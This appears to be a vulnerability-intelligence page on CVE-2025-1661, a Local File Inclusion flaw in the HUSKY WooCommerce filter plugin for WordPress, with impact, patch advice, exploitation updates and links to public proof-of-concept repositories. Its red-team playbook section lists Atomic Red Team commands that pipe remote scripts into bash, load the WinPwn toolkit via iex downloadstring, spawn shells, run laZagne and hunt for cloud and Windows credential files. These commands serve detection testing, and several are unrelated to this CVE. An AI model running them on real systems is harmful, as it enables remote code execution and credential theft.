CVE-2025-1661
Overview
This vulnerability is a Local File Inclusion (LFI) flaw caused by insufficient input validation in the 'template' parameter of the woof_text_search AJAX action within the HUSKY – Products Filter Professional for WooCommerce plugin. The root cause lies in the plugin's failure to properly sanitize user-supplied input before including files on the server, affecting all versions up to and including 1.3.6.5. This improper handling allows arbitrary file inclusion via crafted requests to the affected AJAX endpoint.
Vulnerability Description
The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to include and execute arbitrary files on the server, resulting in full code execution capabilities. This enables bypass of access controls, unauthorized data access, and potential server compromise. No authentication or user interaction is required, and the attack can be performed over the network, consistent with CVSS vector AV:N/AC:L/PR:N/UI:N. The business impact includes data breaches, service disruption, and complete system takeover.
Solution
Remediation requires upgrading the HUSKY – Products Filter Professional for WooCommerce plugin to a version later than 1.3.6.5 where the vulnerability is patched. Detailed patch information and instructions are available through the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5). Users should apply the vendor’s update promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is characterized by a Local File Inclusion (LFI) flaw. This issue arises from improper handling of the 'template' parameter within the woof_text_search AJAX action. When an attacker manipulates this parameter, they can potentially include arbitrary files from the server's file system. The exploitation of this vulnerability does not require authentication, which significantly lowers the barrier for attackers, as they can execute malicious PHP code embedded in the included files. This flaw affects all versions up to and including 1.3.6.5, making it a critical concern for any installations of this plugin.
Attack vectors for exploiting this vulnerability are straightforward yet highly effective. An unauthenticated attacker can craft a specific request to the vulnerable AJAX endpoint, altering the 'template' parameter to point to sensitive files on the server, such as configuration files or other PHP scripts. Once the attacker successfully includes a file, they can execute arbitrary PHP code, which may lead to full server compromise. For instance, if the attacker can upload a file containing malicious PHP code, they can then include and execute it, potentially allowing them to bypass access controls, manipulate data, or even gain administrative access to the WordPress installation.
The real-world impact of this vulnerability can be severe, particularly for e-commerce platforms relying on the WooCommerce plugin. Successful exploitation could lead to unauthorized access to sensitive customer data, including payment information, personal details, and order histories. The business risks associated with such a breach are substantial, encompassing financial losses, reputational damage, and potential legal repercussions due to non-compliance with data protection regulations. Furthermore, the ease with which this vulnerability can be exploited means that many businesses may find themselves targeted by opportunistic attackers seeking to exploit vulnerable systems.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating the HUSKY plugin to the latest version is the most effective way to ensure that known vulnerabilities are patched. Additionally, employing a web application firewall (WAF) can help filter out malicious requests targeting the vulnerable AJAX endpoint. Monitoring server logs for unusual access patterns or attempts to include files can also provide early warning signs of an attempted exploitation. Furthermore, restricting file permissions on the server can minimize the potential impact of a successful attack by limiting the files that can be accessed or executed.
In conclusion, the Local File Inclusion vulnerability in the HUSKY – Products Filter Professional for WooCommerce plugin poses a significant threat to WordPress installations. Its ease of exploitation and potential for severe consequences necessitate immediate attention from website administrators. By adopting proactive detection and mitigation strategies, organizations can protect themselves from the risks associated with this vulnerability and maintain the integrity and security of their e-commerce platforms.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-1661, evidenced by a recent emergence of new proof-of-concept exploits circulating within attacker communities. Our telemetry indicates a sustained upward trend in detection activity, accompanied by a modest increase in the EPSS score, signaling growing attacker interest and potential for exploitation. This development elevates the urgency for defenders, as the availability of multiple public PoCs lowers the barrier for adversaries to weaponize the vulnerability, increasing the likelihood of widespread exploitation attempts. Consequently, the threat level associated with this Local File Inclusion vulnerability has intensified, reflecting a more active exploitation landscape that demands heightened vigilance from security teams monitoring WordPress environments leveraging the affected plugin.
Update 2 — July 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Local File Inclusion vulnerability in the HUSKY – Products Filter Professional for WooCommerce plugin. This increase in activity coincides with the emergence of additional proof-of-concept exploits publicly available on GitHub, which has lowered the technical barrier for adversaries to weaponize the flaw. Our telemetry indicates that this surge is not accompanied by a corresponding rise in the EPSS score, suggesting that while the exploitation attempts are becoming more frequent, the overall likelihood of widespread automated attacks remains stable for now. However, the growing exploitation activity signals heightened attacker interest and experimentation, which raises the risk of more sophisticated or large-scale campaigns developing imminently. For defenders, this evolving threat landscape underscores the need for increased monitoring and rapid response capabilities, as the vulnerability’s critical severity combined with active exploitation attempts significantly elevates the overall threat level.
Update 3 — August 05, 2026
CSURFACE threat intelligence has observed a marked escalation in exploitation attempts targeting the Local File Inclusion vulnerability in the HUSKY – Products Filter Professional for WooCommerce plugin. This increase is accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub, signaling growing attacker confidence and lowering the barrier for widespread exploitation. Although the EPSS score remains stable, the sustained rise in detection activity across our sensors indicates that adversaries are actively refining their tactics and expanding testing efforts. This development elevates the threat level by increasing the likelihood of successful attacks, particularly against unpatched or poorly monitored WordPress environments. Defenders should recognize that the vulnerability is no longer a theoretical risk but an actively exploited vector, underscoring the urgency of enhanced detection and response measures.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Pluginus | Husky - Products Filter Professional For Woocommerce | All |
cpe:2.3:a:pluginus:husky_-_products_filter_professional_for_woocommerce:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
shahwarshah/CVE-2025-1661
HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI)
|
shahwarshah | 0 | 1 | 2025-05-20 | View |
|
gbrsh/CVE-2025-1661
HUSKY – Products Filter Professional for WooCommerce < 1.3.6.6 - Local File Inclusion PoC
|
gbrsh | 1 | 0 | 2025-03-13 | View |
|
MuhammadWaseem29/CVE-2025-1661
HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI)
|
MuhammadWaseem29 | 0 | 0 | 2025-03-18 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-1661 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text/index.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3253169%40woocommerce-products-filter&new=3253169%40woocommerce-products-filter&sfp_email=&sfph_mail= |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3249621%40woocommerce-products-filter&new=3249621%40woocommerce-products-filter&sfp_email=&sfph_mail= |